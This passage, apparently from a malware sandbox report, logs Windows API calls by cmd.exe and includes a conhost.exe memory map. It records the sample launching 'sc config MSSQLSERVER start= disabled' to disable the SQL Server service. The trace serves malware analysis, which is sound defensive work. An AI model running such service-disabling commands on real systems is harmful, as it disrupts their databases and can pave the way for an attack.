lpFindFileData=0x4d8f6c8) returned 0x4ef05c8 [0127.405] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0127.405] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0127.405] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4d8f6c8 | out: lpFindFileData=0x4d8f6c8) returned 0x4ef05c8 [0127.405] FindClose (in: hFindFile=0x4ef05c8 | out: hFindFile=0x4ef05c8) returned 1 [0127.405] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0127.405] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0127.405] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0127.405] GetEnvironmentStringsW () returned 0x4ef7d90* [0127.405] FreeEnvironmentStringsA (penv="=") returned 1 [0127.405] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.406] GetConsoleOutputCP () returned 0x1b5 [0127.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.406] GetUserDefaultLCID () returned 0x409 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4d8fa78, cchData=128 | out: lpLCData="0") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4d8fa78, cchData=128 | out: lpLCData="0") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4d8fa78, cchData=128 | out: lpLCData="1") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0127.406] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0127.406] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.407] GetConsoleTitleW (in: lpConsoleTitle=0x4efaa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.407] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0127.407] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0127.408] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0127.408] _wcsicmp (_String1="sc", _String2=")") returned 74 [0127.408] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0127.408] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0127.408] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0127.408] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0127.408] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0127.408] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0127.409] GetConsoleTitleW (in: lpConsoleTitle=0x4d8f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.409] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0127.409] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0127.409] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0127.409] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0127.409] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0127.409] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0127.409] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0127.409] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0127.409] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0127.409] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0127.409] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0127.409] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0127.409] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0127.409] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0127.409] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0127.409] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0127.409] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0127.409] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0127.409] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0127.409] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0127.409] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0127.409] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0127.409] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0127.409] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0127.409] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0127.410] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0127.410] _wcsicmp (_String1="sc", _String2="START") returned -17 [0127.410] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0127.410] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0127.410] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0127.410] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0127.410] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0127.410] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0127.410] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0127.410] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0127.410] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0127.410] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0127.410] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0127.410] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0127.410] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0127.410] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0127.410] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0127.410] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0127.410] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0127.410] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0127.410] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0127.410] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0127.410] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0127.410] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0127.410] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0127.410] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0127.410] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0127.410] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0127.410] _wcsicmp (_String1="sc", _String2="START") returned -17 [0127.410] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0127.410] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0127.410] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0127.410] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0127.410] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0127.410] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0127.410] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0127.411] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0127.411] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0127.411] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0127.411] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0127.411] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0127.411] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0127.411] SetErrorMode (uMode=0x0) returned 0x0 [0127.411] SetErrorMode (uMode=0x1) returned 0x0 [0127.411] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4ef05d0, lpFilePart=0x4d8f26c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4d8f26c*="Desktop") returned 0x1d [0127.411] SetErrorMode (uMode=0x0) returned 0x1 [0127.411] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0127.411] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.419] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.419] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.419] GetConsoleTitleW (in: lpConsoleTitle=0x4d8f4ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.420] InitializeProcThreadAttributeList (in: lpAttributeList=0x4d8f418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4d8f3fc | out: lpAttributeList=0x4d8f418, lpSize=0x4d8f3fc) returned 1 [0127.420] UpdateProcThreadAttribute (in: lpAttributeList=0x4d8f418, dwFlags=0x0, Attribute=0x60001, lpValue=0x4d8f404, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4d8f418, lpPreviousValue=0x0) returned 1 [0127.420] GetStartupInfoW (in: lpStartupInfo=0x4d8f450 | out: lpStartupInfo=0x4d8f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.420] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.421] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.421] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSSQLSERVER start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4d8f3a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSSQLSERVER start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4d8f3ec | out: lpCommandLine="sc config MSSQLSERVER start= disabled", lpProcessInformation=0x4d8f3ec*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xda4, dwThreadId=0xdbc)) returned 1 [0127.427] CloseHandle (hObject=0xa4) returned 1 [0127.427] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.427] GetEnvironmentStringsW () returned 0x4ef9ef8* [0127.427] FreeEnvironmentStringsA (penv="=") returned 1 [0127.427] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0127.471] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4d8f384 | out: lpExitCode=0x4d8f384*=0x424) returned 1 [0127.471] CloseHandle (hObject=0xa8) returned 1 [0127.471] _vsnwprintf (in: _Buffer=0x4d8f46c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4d8f38c | out: _Buffer="00000424") returned 8 [0127.471] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0127.471] GetEnvironmentStringsW () returned 0x4efb340* [0127.471] FreeEnvironmentStringsA (penv="=") returned 1 [0127.471] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.471] GetEnvironmentStringsW () returned 0x4efb340* [0127.471] FreeEnvironmentStringsA (penv="=") returned 1 [0127.471] DeleteProcThreadAttributeList (in: lpAttributeList=0x4d8f418 | out: lpAttributeList=0x4d8f418) [0127.471] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.471] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.471] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.471] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.472] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.472] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.472] SetConsoleInputExeNameW () returned 0x1 [0127.472] GetConsoleOutputCP () returned 0x1b5 [0127.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.472] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.472] exit (_Code=1060) Thread: id = 374 os_tid = 0xdb4 Process: id = "93" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x45c92000" os_pid = "0xdc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "92" os_parent_pid = "0xdd4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5791 start_va = 0x7f569000 end_va = 0x7f569fff entry_point = 0x0 region_type = private name = "private_0x000000007f569000" filename = "" Region: id = 5792 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5793 start_va = 0x17ebd90000 end_va = 0x17ebdaffff entry_point = 0x0 region_type = private name = "private_0x00000017ebd90000" filename = "" Region: id = 5794 start_va = 0x17ebdb0000 end_va = 0x17ebdc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ebdb0000" filename = "" Region: id = 5795 start_va = 0x17ebdd0000 end_va = 0x17ebe0ffff entry_point = 0x0 region_type = private name = "private_0x00000017ebdd0000" filename = "" Region: id = 5796 start_va = 0x7df5ff870000 end_va = 0x7ff5ff86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff870000" filename = "" Region: id = 5797 start_va = 0x7ff6c4430000 end_va = 0x7ff6c4452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4430000" filename = "" Region: id = 5798 start_va = 0x7ff6c4453000 end_va = 0x7ff6c4453fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4453000" filename = "" Region: id = 5799 start_va = 0x7ff6c445e000 end_va = 0x7ff6c445ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c445e000" filename = "" Region: id = 5800 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5801 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5802 start_va = 0x17ebf30000 end_va = 0x17ec02ffff entry_point = 0x0 region_type = private name = "private_0x00000017ebf30000" filename = "" Region: id = 5803 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5804 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5805 start_va = 0x17ebd90000 end_va = 0x17ebd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ebd90000" filename = "" Region: id = 5806 start_va = 0x17ebda0000 end_va = 0x17ebda6fff entry_point = 0x0 region_type = private name = "private_0x00000017ebda0000" filename = "" Region: id = 5807 start_va = 0x17ebe10000 end_va = 0x17ebecdfff entry_point = 0x17ebe10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5808 start_va = 0x17ebed0000 end_va = 0x17ebf0ffff entry_point = 0x0 region_type = private name = "private_0x00000017ebed0000" filename = "" Region: id = 5809 start_va = 0x17ebf10000 end_va = 0x17ebf10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ebf10000" filename = "" Region: id = 5810 start_va = 0x17ebf20000 end_va = 0x17ebf26fff entry_point = 0x0 region_type = private name = "private_0x00000017ebf20000" filename = "" Region: id = 5811 start_va = 0x17ec030000 end_va = 0x17ec1b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ec030000" filename = "" Region: id = 5812 start_va = 0x17ec1c0000 end_va = 0x17ec1c0fff entry_point = 0x0 region_type = private name = "private_0x00000017ec1c0000" filename = "" Region: id = 5813 start_va = 0x17ec1d0000 end_va = 0x17ec1d0fff entry_point = 0x0 region_type = private name = "private_0x00000017ec1d0000" filename = "" Region: id = 5814 start_va = 0x17ec1e0000 end_va = 0x17ec1effff entry_point = 0x0 region_type = private name = "private_0x00000017ec1e0000" filename = "" Region: id = 5815 start_va = 0x17ec1f0000 end_va = 0x17ec370fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ec1f0000" filename = "" Region: id = 5816 start_va = 0x17ec380000 end_va = 0x17ed77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000017ec380000" filename = "" Region: id = 5817 start_va = 0x7ff6c4330000 end_va = 0x7ff6c442ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4330000" filename = "" Region: id = 5818 start_va = 0x7ff6c445c000 end_va = 0x7ff6c445dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c445c000" filename = "" Region: id = 5819 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5820 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5821 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5822 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5823 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5824 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5825 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5826 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5827 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5828 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5829 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5830 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 371 os_tid = 0xdcc Thread: id = 372 os_tid = 0xdc8 Thread: id = 373 os_tid = 0xdc0 Process: id = "94" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x2494d000" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "92" os_parent_pid = "0xdd4" cmd_line = "sc config MSSQLSERVER start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], 